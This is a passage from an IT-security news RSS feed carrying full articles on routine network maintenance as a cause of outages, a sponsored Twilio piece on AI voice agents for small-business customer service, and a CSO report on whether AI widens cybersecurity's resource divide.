<guid isPermaLink="true">https://tsecurity.de/de/3664719/it-security-nachrichten/routine-maintenance-as-a-failure-vector-in-modern-networks/</guid>
<pubDate>Mon, 13 Jul 2026 11:08:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Early in my consulting career, I assumed maintenance windows reduced risk. After all, the purpose of planned maintenance is to improve reliability, apply fixes and prevent future outages. That assumption changed after I participated in what should have been a routine infrastructure change.</p>



<p>Every pre-check passed. Device health looked normal. High-availability synchronization was complete. Monitoring showed no obvious concerns. Yet shortly after the change, users began reporting application failures.</p>



<p>The root cause was not a failed upgrade, hardware fault or software defect. The maintenance activity exposed a dependency elsewhere in the traffic path that nobody had considered.</p>



<p>Since then, I have seen similar patterns repeatedly across enterprise environments. The change itself was rarely the problem. The problem was the assumption that the change was isolated.</p>



<p>Planned maintenance is intended to reduce risk, but in practice, it often introduces risk into an otherwise stable network.</p>



<p>Many production incidents result from routine tasks such as firewall updates, DNS changes, certificate renewals, routing adjustments, load balancer failovers, WAF updates, switch upgrades or software patches, rather than dramatic failures.</p>



<p>The reality is that “routine” does not equate to “low risk.” It simply means the activity has been performed before, not that the current environment will respond the same way.</p>



<p>Modern networks have become too interconnected for maintenance to be treated as a simple device-level task. A change to one control point can expose a dependency elsewhere in the traffic path. A firewall update can affect asymmetric return traffic. A DNS change can shift users to a data center where persistence is not aligned. A load balancer failover can expose stale ARP or MAC learning issues. A certificate renewal can cause an inspection or TLS negotiation to fail in the backend. A WAF update can block application behavior that was never visible in testing.</p>



<p>Failures rarely stem from the maintenance activity itself, but rather from the assumption that the change is isolated.</p>



<h2 class="wp-block-heading">Why routine changes still cause outages</h2>



<p>In traditional network operations, the unit of change was often a device: upgrade a switch, modify a router, add a firewall rule, renew a certificate or reboot an appliance. That model worked better when application traffic paths were simpler, and dependencies were easier to understand.</p>



<p>Today, a single user transaction may cross DNS, global traffic management, WAN routing, data center switching, firewalls, load balancers, TLS inspection points, WAF policies, API gateways and backend application tiers. Each layer may make an independent decision about availability, security, routing or session handling.</p>



<p>This creates a risky maintenance pattern. Teams often validate only the component they changed, not the complete traffic flow before and after the change. Devices may appear healthy, configurations may load correctly and all checks may pass, yet users can still experience failures due to a changed dependency somewhere in the end-to-end path.</p>



<p>Google’s Site Reliability Engineering (SRE) guidance highlights that changes remain one of the most common sources of service disruption, which is why mature organizations invest heavily in change validation, rollback planning and observability. <a href="https://sre.google/sre-book/">The SRE book</a> provides extensive discussion of change management, reliability engineering and operational risk in large-scale environments.</p>



<p>For this reason, maintenance windows should be evaluated as both operational events and potential failure vectors.</p>



<h2 class="wp-block-heading">Common failure points during maintenance</h2>



<p>One common issue is state mismatch. Firewalls, load balancers, NAT devices and application delivery controllers often maintain connection or session state. During failover, reboot or path change, existing flows may not survive even if the standby device becomes active as designed. New connections may succeed while long-lived sessions fail. In other cases, traffic may enter through one device and return through another, causing stateful inspection to drop packets that appear invalid.</p>



<p>Asymmetric routing is another frequent cause. A routing change may look harmless from a Layer 3 perspective, but if the forward and return paths traverse different firewalls or inspection zones, applications can fail intermittently. The network may still be “up,” but the security policy no longer sees the full conversation.</p>



<p>Layer 2 behavior is also underestimated. In highly available data center designs, MAC learning, ARP cache behavior, VLAN tagging, port channels and first-hop gateway behavior can determine whether traffic moves cleanly after a failover. A device may successfully assume an active role, but upstream switches or firewalls may still forward traffic toward the old path until tables age out or are refreshed.</p>



<p>DNS and GSLB changes introduce a different class of risk. Teams often test name resolution, but resolution is only the first step. The more important question is where users are being sent and whether that destination is ready to handle production traffic.</p>



<p><a href="https://www.internetsociety.org/resources/deploy360/dns/">DNS resilience guidance published by the Internet Society</a> emphasizes that successful name resolution alone does not guarantee application availability, particularly when multiple infrastructure dependencies exist behind the DNS response.</p>



<p>If global traffic management shifts users from one data center to another, the receiving site must have aligned firewall rules, load balancer configuration, health monitors, certificates, persistence behavior, routing advertisements and backend capacity. Otherwise, DNS sends users to a site that is not actually ready.</p>



<p>Certificate maintenance can also break more than the browser-facing endpoint. In many environments, TLS is terminated, re-encrypted, inspected or validated across multiple hops. Renewing a certificate on the external virtual server may not address backend certificates, intermediate chains, SNI behavior, cipher compatibility or trust stores used by inspection devices. The maintenance task may be described as a certificate renewal, but the real dependency is end-to-end TLS negotiation.</p>



<p>Security policy maintenance creates another risk. WAFs, IPSs, DDoS protection systems, bot defense platforms and firewall policies are designed to block abnormal behavior. But during updates, tuning changes or signature refreshes, they can also block legitimate application traffic if policy enforcement is not validated against real transaction patterns.</p>



<p>This is especially true for APIs, where small differences in headers, methods, payload structure or authentication flows can trigger unexpected enforcement.</p>



<h2 class="wp-block-heading">The test environment problem</h2>



<p>Many teams rely on pre-checks and test environments, but these controls are often less effective than they seem.</p>



<p>Pre-checks confirm device reachability, interface status, route existence, pool member availability and HA health. While necessary, these checks do not ensure production traffic will survive a path change because they focus on infrastructure rather than transaction validation.</p>



<p>Test environments rarely mirror production. Production environments involve real user volume, client diversity, DNS caching behavior, firewall states, certificates, backend latency and complex dependencies. A failover that succeeds in a lab may behave very differently in the real world.</p>



<p>This does not render testing useless, but test results should not be considered proof of production safety. They provide evidence, not a guarantee.<br><br>This challenge aligns with broader <a href="https://www.nist.gov/cyberframework">operational resilience guidance from the NIST Cybersecurity Framework</a>, which emphasizes continuous monitoring, validation and recovery planning as critical operational capabilities.</p>



<p>A stronger maintenance process starts with mapping the traffic path before the window. For critical applications, teams should understand the normal ingress path, egress path, firewall zones, NAT points, load balancer virtual servers, DNS or GSLB decision points, TLS termination points, persistence requirements and backend dependencies.</p>



<p>The next step is defining failure expectations. What happens to existing sessions if a firewall is rebooted? Should source MAC, floating IP, ARP or upstream forwarding behavior change during a load balancer failover? How long will cached clients continue to access the old site after a DNS shift? Which clients and inspection devices validate the certificate chain when a certificate is replaced?</p>



<p>These questions should be addressed before the maintenance window, not during an outage.</p>



<p>Pre-checks should include both control-plane and data-plane evidence. Control-plane checks confirm configuration, synchronization, device health, routing tables, interface status and object availability. Data-plane checks validate real traffic movement: TCP handshakes, TLS negotiation, HTTP status codes, API responses, session persistence, source NAT behavior and return-path consistency.</p>



<p>During the change, monitoring should focus on symptoms that expose traffic failure early. Device CPU and interface status are useful, but they are not enough. Teams should also watch connection resets, denied firewall logs, WAF violation spikes, pool member selection failures, DNS answer changes, TCP retransmissions, backend 5xx errors and synthetic transaction results.</p>



<p>Rollback planning must also be precise. Simply rolling back a configuration is often insufficient. If a DNS record changes, cached clients may continue using the previous answer. If a firewall state table is cleared, restoring the rule does not recover active sessions. If failover alters forwarding behavior, upstream devices may require ARP refresh, route reconvergence or manual validation.</p>



<p>An effective rollback plan should identify lost state, persistent caches and the evidence required to confirm recovery.</p>



<h2 class="wp-block-heading">Treating maintenance as a resilience exercise</h2>



<p>The objective is not to make maintenance overly complex or bureaucratic. The objective is to avoid underestimating its risks.</p>



<p>Every maintenance window is a controlled opportunity to test whether the network behaves as specified by the architecture.</p>



<p>If failover is part of the design, maintenance should verify failover behavior. If a secondary data center is expected to handle traffic, maintenance should demonstrate that it can process real transactions. If security policies are updated, maintenance should prove that legitimate traffic is still allowed. If certificates are renewed, maintenance should validate the complete TLS path, not just the public endpoint.</p>



<p><a href="https://uptimeinstitute.com/resources">Industry outage studies published by the Uptime</a> Institute consistently show that human error and process failures remain significant contributors to downtime. Their annual outage research continues to highlight the role of operational processes and maintenance activities in service disruptions.<br><br>Maintenance windows provide an opportunity to identify those weaknesses before they become customer-facing incidents.</p>



<p>This requires closer collaboration between network, security, application and operations teams. Network engineers may own routing or load-balancing changes, but application teams understand transaction flows. Security teams understand inspection and enforcement behavior. Operations teams often see user-impacting symptoms first.</p>



<p>Treating maintenance as a shared traffic event rather than a device event reduces blind spots.</p>



<p>Routine maintenance will always involve some risk. However, the greatest risk is the false confidence that the term ‘routine’ conveys.</p>



<p>Modern networks fail in the spaces between systems: between DNS and load balancing, between firewalls and routing, between TLS inspection and application behavior, between HA design and actual forwarding state. Maintenance exposes those spaces.</p>



<p>For that reason, network teams should view every maintenance window as more than a checklist. It is a live test of architecture, operational discipline and production resilience.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI voice agents and the human touch: A new playbook for SME customer engagement]]></title>
<description><![CDATA[Customer expectations don’t end when business hours do, which is why delivering a fast, always-on customer experience (CX) has traditionally required large call centres and significant resources. This often placed small businesses at a disadvantage, as many lacked the manpower and budget to provi...]]></description>
<link>https://tsecurity.de/de/3664586/it-nachrichten/ai-voice-agents-and-the-human-touch-a-new-playbook-for-sme-customer-engagement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664586/it-nachrichten/ai-voice-agents-and-the-human-touch-a-new-playbook-for-sme-customer-engagement/</guid>
<pubDate>Mon, 13 Jul 2026 10:03:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Customer expectations don’t end when business hours do, which is why delivering a fast, always-on customer experience (CX) has traditionally required large call centres and significant resources. This often placed small businesses at a disadvantage, as many lacked the manpower and budget to provide 24/7 support at scale. Today, AI has completely levelled the playing field. Even small businesses now have access to powerful tools that can answer queries, resolve routine issues, and deliver highly personalised interactions around the clock.</p>



<p>But adopting AI in customer engagement is not just a question of efficiency. For smaller businesses especially, where loyalty is often built on familiarity, trust, and personal service, the real challenge is using AI in ways that strengthen rather than dilute the human connection that customers value most.</p>



<p>Human empathy combined with AI efficiency is a delicate blend. Done right, it ensures that every customer interaction feels personal, thoughtful, and seamless, whether the customer is engaging with a bot at 2 a.m. or a live agent during office hours.</p>



<p>So, how can small businesses embrace always-on virtual agents without losing the human connection that defines their identity? Here’s a practical playbook to guide the transition.</p>



<h2 class="wp-block-heading">1. Understand what customers want: Speed, simplicity, and empathy</h2>



<p>Before diving into AI adoption, it’s critical to understand what customers expect. Twilio’s <a href="https://www.twilio.com/en-us/lp/digital-patience-apj?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub_digital-patience" rel="sponsored"><em>Di</em></a><em><a href="https://www.twilio.com/en-us/lp/digital-patience-apj?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub_digital-patience" target="_blank" rel="sponsored">g</a></em><a href="https://www.twilio.com/en-us/lp/digital-patience-apj?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub_digital-patience" rel="sponsored"><em>ital Patience</em></a> study suggests that while speed matters, it is not the only thing that customers value. Twilio found that 46% of respondents in the Asia-Pacific and Japan region say quick service and resolution are most important, but 51% say delays are acceptable if they lead to better customer support. The study also notes that customers are open to AI, but still value human touchpoints more highly.</p>



<p>The takeaway: AI should enhance CX, not replace it. Businesses can let natural-sounding AI voice agents handle inbound calls, regardless of peak hours or time zones. These virtual agents act as an intelligent frontline – answering common questions and qualifying leads – before seamlessly routing the conversation to a live human representative. The result? Callers get immediate answers, and the business captures every opportunity without losing the human touch.</p>



<h2 class="wp-block-heading">2. Map the handover points between AI and humans</h2>



<p>One of the most common pitfalls in implementing AI is failing to clearly define when and how customers transition from bots to human agents. To avoid customer frustration, organisations must thoughtfully map out these “handover points” by designing for two key principles: choice and continuity.</p>



<h3 class="wp-block-heading"><strong><em>Designing for Choice</em></strong></h3>



<p>Give customers the option to reach a human when needed. While AI is perfectly suited for routine inquiries like FAQs or order tracking, customers should never feel trapped in a bot loop. Always provide a clear, accessible option for them to choose to escalate the issue. Additionally, configure your system to proactively step in and offer a human handoff the moment it detects emotion, ambiguity, or complex steps.</p>



<h3 class="wp-block-heading"><strong><em>Designing for Continuity</em></strong></h3>



<p>Effective handovers rely on technology that recognises when an issue exceeds AI’s scope. By leveraging natural language processing and intelligent routing, organisations can ensure the transition from machine to human is frictionless. Crucially, this means automatically carrying the full history and context of the interaction forward so the customer never needs to repeat themselves.</p>



<p>Achieving this level of continuity requires a new approach to managing interaction data during handovers. Instead of passing along a raw transcript, organisations need a managed memory service that provides agents with persistent context across every conversation, channel, and session. By transforming customer preferences, unresolved issues, and intent into a structured semantic profile—one that continuously evolves and reconciles new interactions as they occur—agents can quickly understand the relationship and continue the interaction without disruption.</p>



<p>To support truly omnichannel experiences, the system must also resolve identity automatically across touchpoints, linking interactions from phone, email, messaging apps, and other channels to a single customer profile. Equally important is the ability to surface only the information that is relevant to the task at hand. By presenting agents with a concise summary of the active issue and customer preferences, grounded in verified business knowledge such as product policies and FAQs, organisations can reduce resolution times while ensuring customers experience a seamless continuation of the conversation.</p>



<h2 class="wp-block-heading">3. Don’t automate for automation’s sake</h2>



<p>AI adoption should never feel like a “set it and forget it” strategy. Instead, it should be approached as a way to solve real business problems. It starts with asking questions like: What are the most time-consuming tasks for the team? What frustrates customers the most?</p>



<p>For instance, a restaurant might automate table reservations and menu queries, while a small online retailer could deploy AI to handle order status updates or product recommendations. These targeted use cases ensure that AI adds tangible value without overwhelming operations.</p>



<p>Take the example of <a href="https://customers.twilio.com/en-us/driva?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub" target="_blank" rel="sponsored">Driva</a>, a fast-growing online finance broker that deployed AI-powered customer service tools to answer routine enquiries and provide immediate assistance while customers wait in the call queue. By automating common interactions, Driva reduced the volume of requests requiring human intervention and achieved a 5% uplift in conversion rates at key points in the customer journey.</p>



<h2 class="wp-block-heading">4. Invest in AI that connects</h2>



<p>While consumers embrace automation, <a href="https://www.twilio.com/en-us/lp/digital-patience-apj?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub_research" target="_blank" rel="sponsored">research</a> shows they still draw comfort from the warmth of a human voice. To make your virtual agents feel less robotic and more like an extension of your team, look for tools that:</p>



<ul class="wp-block-list">
<li>Deliver human-like voice AI experiences at scale through natural turn-taking and barge-in capabilities.</li>



<li>Connect interactions across voice, messaging, and digital channels into a single thread so every exchange builds on the last.</li>



<li>Leverage Natural Language Processing (NLP) that enables conversational systems to interpret context, mimic human tone, and even recognise sentiment.</li>



<li>Place orchestration at the heart of the experience. An effective orchestration engine acts as the “conductor,” actively coordinating workflows and routing interactions so the right resource—whether an AI bot or a human—handles the right moment.</li>
</ul>



<p>When AI bots, automated workflows, and human teams are seamlessly coordinated behind the scenes, the customer simply experiences one unbroken, dynamic dialogue. For small enterprises, this means delivering sophisticated experiences that effortlessly bridge the gap between automation and live support, even at scale.</p>



<h2 class="wp-block-heading">5. Empower teams with real-time context</h2>



<p>AI is not about replacing human workers; it’s here to make jobs easier. However, for teams to fully embrace this new dynamic, organisations must shift their focus from retrospective performance reviews to real-time agent assistance. By feeding agents context as the conversation happens, businesses ensure that every interaction never starts from scratch.</p>



<ul class="wp-block-list">
<li><strong>Leveraging Conversational Intelligence: </strong>Use a real-time intelligence layer that turns live conversations into signals and actions. By analysing voice and messaging with generative AI Language Operators, businesses can understand intent, sentiment, and churn risk instantly, allowing human and AI agents to act in the moment with the right response or escalation.</li>



<li><strong>In-the-Moment Guidance:</strong> Give agents instant context and in-the-moment guidance during every interaction. Surfacing relevant customer history, next-best action suggestions, and summaries in real time allows agents to resolve issues faster without switching tools.</li>



<li><strong>Resolving Complex Customer Needs:</strong> AI can handle routine enquiries with low latency, but human agents still excel at nuanced problem-solving. With AI feeding them persistent customer memory and sentiment analysis in real time, human agents can skip the repetitive questions and immediately focus on resolving complex issues, rescuing deals, or preventing churn.</li>
</ul>



<p>When employees are equipped with real-time customer data and voice-driven insights, SMEs empower their teams to stop reacting to problems and start responding to customers proactively.</p>



<p>Consider global AI platform <a href="https://customers.twilio.com/en-us/genspark?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub" target="_blank" rel="sponsored">Genspark</a>, which leverages a Programmable Voice API for its “Call for Me” agent to handle complex outbound tasks like checking supplier pricing or booking international hotels. The AI can conduct real-time, natural conversations across different languages on the user’s behalf, seamlessly navigating the live interactions before delivering a structured summary. Because these natural voice experiences depend entirely on speed and consistency, the underlying infrastructure provides the critical sub-second latency necessary to keep every automated call clear and uninterrupted.</p>



<h2 class="wp-block-heading">6. Maintain transparency with customers</h2>



<p>Finally, a successful AI implementation requires transparency. Customers should always know when they’re communicating with a bot and when they’ve been handed over to a human. AI-powered interactions must offer clarity by providing transparency about when and how AI is used and explaining next steps in plain language.</p>



<p>Transparency builds trust. Small businesses can go a step further by soliciting customer feedback on their AI interactions and using this input to fine-tune their systems.</p>



<p>For small enterprises, the AI-to-human handover isn’t about choosing between humans and machines; it’s about combining the strengths of both to create exceptional customer experiences. AI can provide the speed and efficiency customers expect, while humans deliver the empathy and creativity they value.</p>



<p>By strategically defining handover points, investing in human-like AI, and empowering agents to work alongside technology, organisations can build a CX strategy that’s as scalable as it is personal.</p>



<p>This blended approach ensures that every interaction – whether managed by a bot or a human – is thoughtful, natural, and distinctly on-brand.  </p>



<p>To learn more about Twilio, visit <a href="https://www.twilio.com/en-us/why-twilio?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_end-cta-ai-voice-agent_brandposthub" target="_blank" rel="sponsored">here</a>.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Can AI narrow cybersecurity’s class divide?]]></title>
<description><![CDATA[At Amazon Web Services (AWS), artificial intelligence is already compressing security work that once took months into minutes.



In the old world, human red teams would find vulnerabilities, write reports, refine those reports, and eventually hand them to defenders, who would then begin building...]]></description>
<link>https://tsecurity.de/de/3664478/it-security-nachrichten/can-ai-narrow-cybersecuritys-class-divide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664478/it-security-nachrichten/can-ai-narrow-cybersecuritys-class-divide/</guid>
<pubDate>Mon, 13 Jul 2026 09:07:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>At Amazon Web Services (AWS), artificial intelligence is already compressing security work that once took months into minutes.</p>



<p>In the old world, human red teams would find vulnerabilities, write reports, refine those reports, and eventually hand them to defenders, who would then begin building detections or fixes, <a href="https://www.linkedin.com/in/stephenschmidt1/">Steve Schmidt</a>, chief security officer at AWS, tells CSO. That process could take “two, four, six, eight, 10 months,” Schmidt says.</p>



<p>“Now with proper application of AI, we can have the detections built for the problems the red team finds in 15 minutes-ish,” he says. “I think the outside is about four hours.”</p>



<p>That kind of workflow offers a glimpse of what AI could make possible for the most sophisticated security organizations: AI agents testing systems, other agents generating defenses, and human security engineers validating results and refining the feedback loop.</p>



<p>But it also raises a more uncomfortable question for the rest of the cybersecurity industry: What happens to organizations that cannot build anything close to that?</p>



<p>The concern has become significant enough that the Trump administration <a href="https://www.csoonline.com/article/4180205/trump-revives-parts-of-canceled-ai-order-with-cybersecurity-focused-directive.html">recently directed</a> agencies to expand access to AI-enabled cybersecurity capabilities for resource-constrained organizations, including rural hospitals, community banks, and local utilities.</p>



<p>The order reflects a growing fear that AI could deepen a divide that has existed in cybersecurity for years: the divide between organizations with money, expertise, and engineering depth, and those struggling to keep pace with basic security demands.</p>



<p>Yet security leaders and practitioners suggest the impact of AI will be more complicated than a simple widening gap. Some experts say AI is merely adding a new layer to a long-standing security poverty problem. Others argue AI could democratize capabilities once reserved for elite organizations. Still others see today’s divide as real, but potentially temporary, as models become cheaper, more open, and easier to run.</p>



<h2 class="wp-block-heading">The class divide was already here</h2>



<p>For <a href="https://www.linkedin.com/in/matthewowenwarner/">Matt Warner</a>, co-founder and CTO of Blumira, the premise that AI is creating a cybersecurity class divide misses a key point: The divide already exists.</p>



<p>“I would go even a step further and say that there has been a class divide for the last 10 to 15 years,” Warner tells CSO.</p>



<p>What AI changes, he argues, is not necessarily the existence of the divide but how stark it becomes. Larger organizations have money, people, and time to experiment with AI. Smaller organizations often do not.</p>



<p>“The big differences that we’re seeing, especially from where we sit in the world, is the difference is getting starker in having the resources to leverage AI and the time to leverage AI more than anything else,” Warner says.</p>



<p>That distinction matters because many smaller organizations are already overwhelmed. Warner pointed to resource-constrained local governments and small or midmarket organizations that are still far behind large enterprises in basic IT and security maturity.</p>



<p>“I can find you a county in Michigan with two IT people for 2,000 employees,” Warner says. “Those people don’t have time to leverage AI and even learn how to use AI because they’re mostly just trying to put out fires.”</p>



<p>That problem is not unique to AI. Smaller organizations have long struggled to patch systems, prioritize vulnerabilities, monitor environments, and respond to incidents with limited staff. AI may help eventually, but only if those organizations have enough capacity to adopt it.</p>



<h2 class="wp-block-heading">Wendy Nather’s framework gets an AI layer</h2>



<p><a href="https://www.linkedin.com/in/chuvakin/">Anton Chuvakin</a>, security advisor in the office of the CISO for Google Cloud, sees the AI divide as part of a much older problem.</p>



<p>“I feel like it sends me back to when <a href="https://www.linkedin.com/in/wendynather/">Wendy Nather</a> invented the security poverty line,” Chuvakin tells CSO, referring to Nather’s <a href="https://www.infosecuritymagazine.nl/files/2fb0642808f57f0f9831532ae8f7e8fd.pdf">2011 concept</a> describing organizations that lack the money, expertise, capability, or influence to implement effective security.</p>



<p>Chuvakin is skeptical that AI fundamentally changes that model. “I don’t think AI necessarily breaks that model,” he says. “I think it just adds another dimension.”</p>



<p>Cybersecurity has always been shaped by unequal access to top talent, tools, and services, Chuvakin argues. Large organizations could afford better SIEM deployments, advanced DLP programs, threat hunters, application security experts, and incident response retainers. Smaller organizations often could not.</p>



<p>AI may become another scarce resource, but Chuvakin cautions against overstating the role of model cost alone. In his view, the <a href="https://www.cio.com/article/4165232/whats-holding-back-enterprise-ai-shortage-of-talent-cios-say.html">bigger structural issue may be talent</a> rather than tokens.</p>



<p>“Prices for people won’t drop, but prices for LLMs may drop,” he believes.</p>



<p>That means the organizations with the greatest advantage may not simply be those that can afford the most expensive models. They may be the ones that can afford the people who know how to use them — and, as the frontier-access debate below suggests, that talent gap may prove more durable than any gap in model access itself.</p>



<h2 class="wp-block-heading">AI creates new costs — and new uncertainties</h2>



<p>Nather herself, now senior research initiatives director at 1Password, sees AI affecting every dimension of the security poverty line: money, expertise, capability, and influence.</p>



<p>The financial challenges are not limited to whether an organization can pay for an AI tool. In some cases, organizations that cannot afford enterprise licensing may end up making tradeoffs around privacy.</p>



<p>“If an organization can’t afford an enterprise license for the models they’re using, then they can’t keep their data private,” Nather tells CSO. “So, they have to give up privacy because they can’t afford privacy.”</p>



<p>That’s a new twist on an old dimension of the poverty line: It’s not just that under-resourced organizations lack a capability, but that the capability they can afford comes bundled with a risk wealthier organizations don’t have to accept.</p>



<p>Token-based pricing adds another problem: <a href="https://www.cio.com/article/4152601/without-controls-an-ai-agent-can-cost-more-than-an-employee.html">unpredictability</a>. “At this point, nobody knows how much they’re going to burn in tokens at any given time,” she says.</p>



<p>That makes budgeting difficult for organizations that cannot absorb surprise costs. Nather also warns that usage-based pricing is controlled by providers and can change over time, <a href="https://www.cio.com/article/4184688/it-hurtles-toward-the-great-enterprise-pricing-reset.html">leaving customers with limited leverage</a>.</p>



<p>“The charging practice is in the hands of the providers, and they can change it at any time,” she says.</p>



<p>For organizations already operating below the security poverty line, that uncertainty could make AI adoption harder, even if the technology itself becomes more capable.</p>



<h2 class="wp-block-heading">Access to frontier models may be a temporary divide</h2>



<p><a href="https://www.linkedin.com/in/davidbaggett/">Dave Baggett</a>, SVP/GM of the security suite at Kaseya, agrees there is security class divide dynamic playing out today, particularly around access to frontier models.</p>



<p>“There’s definitely a haves and have-nots issue around Mythos specifically because most people don’t have it,” Baggett tells CSO. But he doesn’t think the divide will have a long-term impact. Open-weight models, quantization, mixture-of-experts architectures, and increasingly powerful commodity hardware, he argues, are closing the gap faster than most people expect.</p>



<p>While not every organization will build a frontier model, he says, more organizations may be able to run capable models locally or use cheaper systems that <a href="https://www.csoonline.com/article/4170818/what-happens-when-chinas-ai-catches-up-to-mythos.html">approximate what today’s elite models can do</a>.</p>



<p>“What it says for finding vulnerabilities is at that point, open-source people can run this stuff,” Baggett says. “Then you’re back to having a symmetrical opportunity where the defenders who are writing the open source can run the same tools the attackers would and have them fix the issues.”</p>



<p>His bottom line is that the divide may be real but short-lived. “Right now, there certainly is a have, have-not schism, but it may not be there for long,” Baggett says — a view Chuvakin shares, though he frames it in terms of the model market rather than open source specifically.</p>



<p>“I don’t think it’s the lowering prices example, but it’s more like you’re a top-tier model maker, I’m a second-tier model maker. My model in a year would do what your model did a year ago,” Chuvakin says.</p>



<h2 class="wp-block-heading">The real advantage is operational depth</h2>



<p>Schmidt’s description of AI use at AWS points to another kind of divide: not access to AI, but the ability to operationalize it.</p>



<p>AWS uses multiple models for different tasks, Schmidt says. One model may discover vulnerabilities, while other models validate results or help build defenses. Humans remain accountable for evaluating what the systems produce.</p>



<p>“Because we believe really strongly in human accountability for the use of AI from end to end, we still have humans take a look at what the systems come up with to determine whether they are reasonable and appropriate,” he says.</p>



<p>That workflow requires more than a model. It requires corporate data, secure infrastructure, feedback loops, security engineers, data scientists, and AI specialists who can work together.</p>



<p>Schmidt also pushes back on the idea that running AI locally on powerful consumer hardware is a substitute for production-grade security infrastructure. “Often the value of the model is also dependent on its proximity to data so that the model can ingest, use, and reason about data,” he says. “As a security person, I do not want that to be on your laptop.”</p>



<p>Experimentation on a laptop is useful, Schmidt says, but it is not the same as a secure production environment.</p>



<p>“I want the data to be somewhere safe that I can control, that I can see, that I can reason about, not sitting on your laptop,” he says. “Experimentation in there, awesome. That’s great. But it is not a production infrastructure component.”</p>



<p>That distinction may define the emerging AI security gap. Many organizations may be able to access AI tools. Far fewer may be able to safely integrate them into real security workflows.</p>



<h2 class="wp-block-heading">The democratization argument</h2>



<p><a href="https://www.linkedin.com/in/philvenables/">Phil Venables</a>, a partner at Ballistic Ventures and former CISO of Google Cloud, takes the most optimistic view.</p>



<p>Asked whether AI is widening the gap between well-resourced and under-resourced security organizations, Venables tells CSO, “No, I actually think it’s the exact opposite.”</p>



<p>The reason, he argues, is that AI packages expertise and automation in ways that can be delivered broadly. “One of the fantastic things about AI, and we’re already starting to see this, is [that it’s] a great democratizer of capabilities,” he says. “AI packages up expertise and automation capabilities at a level beyond what prior waves of technology have done, and it makes it available at scale into organizations that have not previously been able to afford these things.”</p>



<p>He points to <a href="https://www.csoonline.com/article/4181930/ai-red-teaming-comes-of-age.html">red teaming</a> as an example. Nearly every organization would like a world-class red team, but few can afford one.</p>



<p>“Pretty much every organization on the planet would love to have a world-class red team to constantly test their security to find and fix things before attackers do,” Venables says. “But very few organizations have ever been able to afford to build a high-end red team.”</p>



<p>AI agents, he argues, could make that kind of capability available more economically. The same pattern could apply to insider threat; third-party risk; software security; governance, risk and compliance; and security operations.</p>



<p>“So even the smallest and resource-constrained organizations can now have access to a higher-end capability,” he maintains.</p>



<p>Venables does see a danger zone, however: under-resourced security teams inside organizations with aggressive AI ambitions. Those teams may <a href="https://www.csoonline.com/article/3529615/companies-skip-security-hardening-in-rush-to-adopt-ai.html">struggle to keep up</a> as the rest of the business adopts AI rapidly. But for many small and midsize organizations, he believes AI could improve access to security capabilities they never had before.</p>



<h2 class="wp-block-heading">A divide over AI — or over readiness?</h2>



<p>For elite organizations, AI is already becoming a force multiplier. Security teams with deep engineering talent, mature data infrastructure, and strong governance can use AI to accelerate testing, detection engineering, vulnerability discovery, and risk management.</p>



<p>For smaller organizations, the picture is less clear. AI may eventually package scarce expertise into affordable services. Open models may reduce dependence on expensive frontier systems. But organizations below the security poverty line still face familiar constraints: too few people, too little time, limited expertise, unpredictable costs, and weak leverage over vendors.</p>



<p>The emerging divide may therefore be less about who has access to AI and more about who can turn AI into durable security outcomes.</p>



<p>That makes the question facing cybersecurity more complicated than whether AI will create haves and have-nots. The industry already had them.</p>



<p>The real question is whether AI becomes another technology that rewards the organizations already best positioned to use it — or the first major security advance in years that helps those below the poverty line finally catch up.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Dataproc optional components support Apache Flink and Docker]]></title>
<description><![CDATA[Google Cloud’s Dataproc lets you run native Apache Spark and Hadoop clusters on Google Cloud in a simpler, more cost-effective way. In this blog, we will talk about our newest optional components available in Dataproc’s Component Exchange: Docker and Apache Flink.Docker container on DataprocDocke...]]></description>
